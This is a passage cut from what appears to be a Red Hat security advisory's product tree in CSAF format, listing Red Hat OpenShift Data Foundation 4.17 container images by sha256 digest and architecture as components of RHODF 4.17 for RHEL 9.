"odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", }, product_reference: "odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", }, product_reference: "odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", }, product_reference: "odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", }, product_reference: "odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", }, product_reference: "odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", }, product_reference: "odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", }, product_reference: "odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", }, product_reference: "odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", }, product_reference: "odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", }, product_reference: "odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", }, product_reference: "odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", }, product_reference: "odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", }, product_reference: "odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", }, product_reference: "odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", }, product_reference: "odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", }, product_reference: "odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", }, product_reference: "odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", }, product_reference: "odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", }, product_reference: "odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", }, product_reference: "odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", }, product_reference: "odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", }, product_reference: "odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", }, product_reference: "odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", }, product_reference: "odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", }, product_reference: "odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", }, product_reference: "odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", }, product_reference: "odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", }, product_reference: "odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", }, product_reference: "odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", }, product_reference: "odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", }, product_reference: "odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", }, product_reference: "odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", }, product_reference: "odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", }, product_reference: "odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", }, product_reference: "odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", }, product_reference: "odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", }, product_reference: "odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", }, product_reference: "odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", }, product_reference: "odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", }, product_reference: "odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", }, product_reference: "odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", }, product_reference: "odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", }, product_reference: "odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", }, product_reference: "odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", }, product_reference: "odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", }, product_reference: "odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", }, product_reference: "odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", }, product_reference: "odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", }, product_reference: "odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: 